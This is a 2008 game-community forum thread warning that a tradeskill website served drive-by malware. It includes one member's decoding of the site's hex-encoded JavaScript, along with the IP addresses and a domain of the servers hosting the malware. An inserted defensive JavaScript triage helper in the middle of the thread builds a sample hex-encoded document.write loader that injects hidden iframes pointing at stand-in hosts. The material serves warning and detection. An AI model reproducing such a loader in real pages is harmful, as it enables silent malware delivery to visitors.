
Thread: AOTS Hacked/Infected?!

  1. #1

    AOTS Hacked/Infected?!

    Went to AOTS to find out some armor info at 4am PST; immediately got an ActiveX control panel, which I said no to. At the same time Adobe Acrobat started running; I hit End Program, it would not end, and each time I hit End it popped a new window. I shut down the lappy and rebooted; when it came back up I was infected with Antivirus XP 2008, which also inserted 4 other EXTREMELY pervasive worms into the HD. Trying to remove them burnt up my antivirus, as the registry changed each time it detected it, so "it wasn't there" each time I tried to heal; running malware designed specifically for this insidious bastard caused four different types of BSOD with tags like "youre******", etc, etc. Finally had to delete the entire partition, create a new one and reformat the OS from the beginning. I would suggest EXTREME CAUTION in using AOTS until someone figures out wtf is going on with it.
    Quote Originally Posted by Venachar:
    Yes. I'm a total idiot. Please don't quote that last sentence out of context
    Well Duh lol.

    I have chronic dyslexia of the keyboard..

    Zen.

  2. #2
    As in Cybershead's AO Tradeskills 2.0?

    Odd... used that either earlier in the week or late last week with no issue. Cybs hasn't been active in AO for some time (afaik), and after putting up the 2nd version of his site I don't know how much he's looked after it, so if there really is an issue then I don't know what to say.
    Ruffixx, 220/30/66 Omni Opifex Fixer
    Pugilius, 206/30/49 Omni Opifex MA
    Blessedbrawl, 200/0 Omni Froob Opifex MA
    Medor, 199/23/42 Neutral Solitus Doctor
    Vindicius, 189/20/46 Omni Atrox Enforcer
    Evilrilius, 100/10 Omni Nano MP - Foremans Killing Machine

    Proud General of Obsidian Order

  3. #3
    Okie, my friend just went there (cause he's hard headed and stupid) to test it. He's running XP 64 (I'm using XP Pro 32); at the regular site nada, but as soon as he hit the section I had saved to favorites (perfected alien tank armor) the same thing happened, Adobe Acrobat popped; he, unlike me, was able to end the program. Apparently his firewall stopped it. He's running t-time, me being the cheap bastard I am was using the Windows firewall. So if you're using Windows as default firewall DO NOT GO THERE.

  4. #4

  5. #5
    Anarchy Arcanum is back up, for tradeskill info, and there's http://lepetitengi-uk.phoenix-fr.org/index.php? as well for tradeskilling. Good to know about the malware at AOTS.
    Quote Originally Posted by Gorathon:
    Wouldn't it be better if all the attributes were combined into one skill called "goodness?"

  6. #6
    Quote Originally Posted by gergiskoo:
    TeaTimer/Spybot-S&D ftw!
    That **** is so annoying. Use NoScript for Firefox and you'll never need it again.
    Thor Mastablasta Hammersmith - Level 220, AI 30, LE 70 Clan Atrox Nano Technician - Setup
    The Red Brotherhood

    I'm a Nano-Technician, don't ever expect me to fight unbuffed, alone or fair.

    Means: about f'ing time :P
    Satenia: heresy <3
    Znore: Mastablasta <3
    Kinkstaah: I have agro from many mobs ;(
    Madarab: we are aoe class, we are supose to use pistols
    Marxgorm: the NT toolset does not fit into my raiding tactics

  7. #7
    Injections can be good...injections can be bad.

    Kids remember this information during your next doctor visit! /cheers


    /end silly
    No longer plays. It ruins my life.

  8. #8
    Ok, another orgmate went to AOTS 3 days before; result: ended up also having to delete that partition. (Tx fer lettin me know b4 I went matey LOL)

    DO NOT go there unless you have a HELLA good firewall/anti-virus, or just like to melt yer works lol.

  9. #9
    Okay, I'm not familiar with the site you speak of; please PM me the link to it so I can safely examine the page source and work my magic in determining if the site is safe or not.
    "When life knocks you on your butt, you have to get back up and punch it in the face." --DJ Ashval of GSP

    Nullified "Bitbucket" Deadcode - 220/25 Neut NanoMage Engi
    Bits10 - 150/14 Clan Opifex Trader

  10. #10
    Ok, on my first analysis I have found some rather funky JavaScript code - it takes a hex-encoded string, translates it into a string of bytes and writes it to the page via document.write();

    I've not yet decoded the strings of machine code, but based on what I've found so far, I can tell you that this site is indeed infectious.

    STAY AWAY!

  11. #11
    Second Analysis:

    I've fully decoded the JavaScript.

    It's a script that specifically targets and exploits security weak points in both Internet Explorer and Mozilla-based browsers such as Firefox.

    Anyway, the script translates the hex-encoded string into more JavaScript that loads 2 viruses through IFRAMEs.

    I've traced the source of the 2 viruses.
    1 is from St. Petersburg, Russia - IP Address 77.221.133.171
    The server is located
    59°89'44" N Latitude
    30°26'42" E Longitude

    The other virus is from a web domain "reddii.org" - registered to a server in Beijing, China. IP Address 220.196.42.213
    39°92'89" N Latitude
    116°38'83" E Longitude

    Both servers seem to be sensitive to HTTP header information (Operating System & Browser Type), as I cannot fetch the viruses from my Linux system normally.

    I can however get them via WINE (Windows emulation).

    No clue what the viruses do exactly, this part is beyond my expertise, but given the locations of the servers I'd say it's how these credit sellers / farmers are stealing accounts.

    STAY AWAY FROM
    AOTRADESKILLS (dot) COM
    Last edited by Xyphos; Aug 9th, 2008 at 11:47:10.
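As an added example (not code from the thread or from the site it discusses), here is a static triage helper for the pattern Xyphos describes in posts #10 and #11: it decodes long hex string literals the way the loader would and lists any IFRAME targets, without ever running the page's script. The sample page, its loader and the hostnames in it are constructed for the demo.

```javascript
// Added example, not code from the thread or from the site it discusses:
// a static triage helper for the pattern described in posts #10 and #11.
// It never executes the page's script; it only decodes long hex string
// literals the way the loader would and reports any IFRAME targets found.
// The sample page and its hosts below are constructed for the demo.

const HEX_LITERAL = /["']([0-9a-fA-F]{16,})["']/g;   // long quoted hex blob
const IFRAME_SRC = /<iframe[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;

// Decode a hex string two characters at a time into text (the loader's logic).
function hexToText(hex) {
  if (hex.length % 2 !== 0 || /[^0-9a-fA-F]/.test(hex)) return null;
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Encode text as hex; used only to build the constructed sample below.
function textToHex(text) {
  return Array.from(text, (c) => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}

// Scan page source for hex blobs, decode each one and pull out iframe targets.
function triagePage(html) {
  const findings = {
    usesDocumentWrite: /document\.write\s*\(/.test(html),
    hexBlobs: 0,
    iframeTargets: [],
  };
  let m;
  while ((m = HEX_LITERAL.exec(html)) !== null) {
    const decoded = hexToText(m[1]);
    if (decoded === null) continue;
    findings.hexBlobs += 1;
    let f;
    while ((f = IFRAME_SRC.exec(decoded)) !== null) findings.iframeTargets.push(f[1]);
  }
  return findings;
}

// Constructed sample: two hidden iframes, hex-encoded and written by a loader.
const INJECTED = '<iframe src="http://first.example.invalid/x.php" width=0 height=0></iframe>'
  + '<iframe src="http://second.example.invalid/in.cgi" width=0 height=0></iframe>';
const SAMPLE_PAGE = '<html><body><p>Tradeskill tables</p><script>var s="' + textToHex(INJECTED)
  + '";var o="";for(var i=0;i<s.length;i+=2)o+=String.fromCharCode(parseInt(s.substr(i,2),16));'
  + 'document.write(o);</script></body></html>';
console.log(triagePage(SAMPLE_PAGE));
```

Run it against a saved copy of a suspect page; a hit on both `usesDocumentWrite` and a non-empty `iframeTargets` is the shape of what the thread describes and is worth blocking at the proxy while the hosts are checked.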

  12. #12
    Oi, interesting.

    Are those "generic" viruses or homemade ones? I mean, do we have a string we could use to find info about them on the internet?

    I went there a couple weeks ago and the site kinda crashed.
    There are no problems that an absence of solution couldn't solve

    Wielder of the "IWin" button.

  13. #13
    Quote Originally Posted by schloops:
    Oi, interesting.

    Are those "generic" viruses or homemade ones? I mean, do we have a string we could use to find info about them on the internet?

    I went there a couple weeks ago and the site kinda crashed.
    Sorry to tell ya mate, but you're probably infected then. One of the main problems I had with these is that as soon as the antivirus picked it up, the values would change and it could not be fixed; it would pop up again in another location soon after, to change yet again once detected. Hence the wipe of partition and HD and reinstallation of my OS and everything else.

    To Xyphos, WTG on being more of a techie than me and pinpointing the nasty, damn j00 linux! (More like damn j00 BILL GATES for giving us such easily exploitable software ) heh

    Btw yes, the first one is easily looked up on Google/eldergeek/etc/etc. It's not even a "virus" per se; it's listed as very bad malware and GFL getting rid of it (Antivirus XP 2008), but as I said that is the LEAST of the problem at the site, it's the worms it installs with that one that will absolutely slay your PC. I was so busy trying to repair/fix/restore/etc that I didn't write all their names down. Update your antivirus/anti-malware/Ad-Aware/SpybotSD/etc and hope they'll pick 'em up.

    At the VERY LEAST I'd suggest changing every single password you've used since going there!!!
    Last edited by ZenWon; Aug 9th, 2008 at 15:27:40.

  14. #14
    Got information on the trojan:

    http://www.paretologic.com/resources...ove=Win32.RBot

    Picked up with XoftSpy.
    Plugsz
    President, Newcomers Alliance 220/30/70 Gun Advy RK1
    Advy Guns since day 1 and damn proud of it
    Manguyver's Foremans/Biomare Services services on pause for now

    Hardcorree 200/30/67 Bringing DD and off-tanking to a battle near you.

  15. #15

  16. #16
    So um...
    That site has always been weird for me; on my old comp (like 6 months ago or more) it locked up Firefox.

    But it seemed to work on this comp... Not sure though what files to look for to see if I did get infected... Gonna try XoftSpy I guess.

    I've got my firewall set up to be very strict about traffic, hopefully that helped since I used that site for AI armor a few weeks ago :s
    Stars "Wormx" Monkey 220/30/70 3rd opi fix on RK1, 7th on all dimensions to hit AI30 Thanks for all the raids : )
    DanceMeTo "Summerglow" TheEndOfLove 220/27/67 Opi Fixer. Yes, I like fixers.
    LifeIs "Winterglow" NoCabaret 150/14/42 Opi Fixer. Waiting for more hits with the nerfbat.
    Doctor "Wormx6" Panda 220/20/55 Atrox doctor, dinged 220 off Thrak key quest : )
    Mr "Ceilingcat" Monkey 220/23/52 Soli MP, hiding in the ceiling, watching...
    Too many other alts to list here...


  17. #17
    Use Linux or use a VM. All other surfing is subject to hell.

  18. #18
    Ok, ran a XoftSpy scan and all it found was the usual low-risk cookies.
    Looks like my firewall/antivirus/luck saved me this time.

    Might as well run some more scans, i.e. Ad-Aware etc.


  19. #19
    These kinds of easy-as-pie JavaScript scripts are so kid-like; we used to play with them in high school. I cannot believe they are still up and around and going strong like this... scary actually.

    Create virii in asm and exploit like a champ or I am not impressed (if anybody associated with the virus is reading this.)
    Last edited by Sir_Malak; Aug 9th, 2008 at 16:52:57.

  20. #20
    Quote Originally Posted by Sir_Malak:
    Create virii in asm and exploit like a champ or I am not impressed (if anybody associated with the virus is reading this.)
    Being a "script kiddie" is easy; writing a real virus takes skill.

    Even worse, most of the "script" ones are just made using someone else's toolkit to make them; just so sad they can't even do it themselves *sigh*.
    Omutb - President - Ring of Destruction

    If you only knew the power of the Frosted Strawberry Poptart....

    "Once more unto the breach, dear friends, once more; Or close the wall up with our English dead." - because Wales just isn't a country

    Chernobyl, providing the freshest bottled water since 1986, for that healthy green glow.
